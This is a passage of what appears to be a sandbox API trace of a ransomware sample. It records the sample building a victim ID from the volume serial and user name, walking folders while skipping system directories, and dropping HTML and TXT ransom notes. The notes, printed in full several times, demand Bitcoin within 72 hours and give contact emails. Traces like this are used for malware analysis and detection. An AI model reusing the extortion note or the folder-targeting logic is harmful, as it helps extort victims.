	[0157.884] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.884] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0157.886] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.886] CreateFileW (lpFileName="C:\\Program Files\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\program files\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.886] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0157.886] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.887] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0157.887] CloseHandle (hObject=0x378) returned 1
	[0157.887] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*" (normalized: "c:\\program files\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf5d6eaf, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0x77a2d861, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0157.888] lstrlenW (lpString="C:\\Program Files\\*.*") returned 20
	[0157.888] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.888] CharLowerBuffW (in: lpsz="C:\\Program Files\\*.*", cchLength=0x14 | out: lpsz="c:\\program files\\*.*") returned 0x14
	[0157.888] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.888] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="windows") returned 0x0
	[0157.888] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.889] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="boot") returned 0x0
	[0157.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.889] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="system volume information") returned 0x0
	[0157.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.889] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.890] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="temp") returned 0x0
	[0157.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.890] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="program files") returned="program files\\*.*"
	[0157.890] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0157.890] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xaec2cf40, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xaec2cf40, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1
	[0157.890] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1
	[0157.890] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1
	[0157.891] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.891] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.891] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)"
	[0157.891] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)"
	[0157.891] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\"
	[0157.891] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\"
	[0157.891] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*"
	[0157.891] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*" (normalized: "c:\\program files (x86)\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xaec2cf40, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xaec2cf40, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9970
	[0158.026] lstrlenW (lpString="C:\\Program Files (x86)\\*.*") returned 26
	[0158.026] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.026] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\*.*", cchLength=0x1a | out: lpsz="c:\\program files (x86)\\*.*") returned 0x1a
	[0158.027] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.027] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="windows") returned 0x0
	[0158.027] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.027] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="boot") returned 0x0
	[0158.027] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.027] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="system volume information") returned 0x0
	[0158.028] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.028] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.028] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.028] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="temp") returned 0x0
	[0158.028] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.028] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="program files") returned="program files (x86)\\*.*"
	[0158.028] FindClose (in: hFindFile=0xfb9970 | out: hFindFile=0xfb9970) returned 1
	[0158.029] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)"
	[0158.029] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*"
	[0158.029] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.029] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.029] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Program Files (x86)\\HELP_DECRYPT_YOUR_FILES.TXT") returned 50
	[0158.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\program files (x86)\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.030] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.030] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.034] CloseHandle (hObject=0x378) returned 1
	[0158.035] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.035] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.036] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0158.037] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.037] CreateFileW (lpFileName="C:\\Program Files (x86)\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\program files (x86)\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.037] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.037] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.038] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0158.038] CloseHandle (hObject=0x378) returned 1
	[0158.038] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.039] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.039] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.039] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Program Files (x86)\\HELP_DECRYPT_YOUR_FILES.HTML") returned 51
	[0158.039] CreateFileW (lpFileName="C:\\Program Files (x86)\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\program files (x86)\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.040] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.040] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0158.043] CloseHandle (hObject=0x378) returned 1
	[0158.043] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.044] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.044] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0158.046] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.047] CreateFileW (lpFileName="C:\\Program Files (x86)\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\program files (x86)\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.047] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.047] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.047] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0158.048] CloseHandle (hObject=0x378) returned 1
	[0158.055] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*" (normalized: "c:\\program files (x86)\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xaec2cf40, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x77bab14a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0158.056] lstrlenW (lpString="C:\\Program Files (x86)\\*.*") returned 26
	[0158.056] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.056] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\*.*", cchLength=0x1a | out: lpsz="c:\\program files (x86)\\*.*") returned 0x1a
	[0158.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.056] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="windows") returned 0x0
	[0158.057] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.057] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="boot") returned 0x0
	[0158.057] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.057] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="system volume information") returned 0x0
	[0158.057] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.057] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.058] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="temp") returned 0x0
	[0158.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.058] StrStrW (lpFirst="c:\\program files (x86)\\*.*", lpSrch="program files") returned="program files (x86)\\*.*"
	[0158.058] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0158.058] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1
	[0158.059] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1
	[0158.059] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1
	[0158.059] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0158.059] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0158.059] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData"
	[0158.059] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData"
	[0158.059] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\"
	[0158.060] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\"
	[0158.060] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*"
	[0158.060] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*" (normalized: "c:\\programdata\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0158.060] lstrlenW (lpString="C:\\ProgramData\\*.*") returned 18
	[0158.060] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.060] CharLowerBuffW (in: lpsz="C:\\ProgramData\\*.*", cchLength=0x12 | out: lpsz="c:\\programdata\\*.*") returned 0x12
	[0158.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.061] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="windows") returned 0x0
	[0158.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.061] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="boot") returned 0x0
	[0158.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.061] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="system volume information") returned 0x0
	[0158.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.062] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.062] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="temp") returned 0x0
	[0158.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.062] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="program files") returned 0x0
	[0158.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.063] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.063] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="appdata") returned 0x0
	[0158.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.063] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="application data") returned 0x0
	[0158.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.070] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="winnt") returned 0x0
	[0158.070] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.070] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="tmp") returned 0x0
	[0158.070] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.071] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="cache") returned 0x0
	[0158.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.071] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.071] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="webcache") returned 0x0
	[0158.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.072] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="inetcache") returned 0x0
	[0158.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.072] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="nvidia") returned 0x0
	[0158.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.072] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="packages") returned 0x0
	[0158.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.073] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="cookies") returned 0x0
	[0158.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.073] StrStrW (lpFirst="c:\\programdata\\*.*", lpSrch="programdata") returned="programdata\\*.*"
	[0158.073] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0158.073] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData"
	[0158.073] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*"
	[0158.074] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.074] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.074] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\ProgramData\\HELP_DECRYPT_YOUR_FILES.TXT") returned 42
	[0158.074] CreateFileW (lpFileName="C:\\ProgramData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\programdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.075] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.075] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.078] CloseHandle (hObject=0x378) returned 1
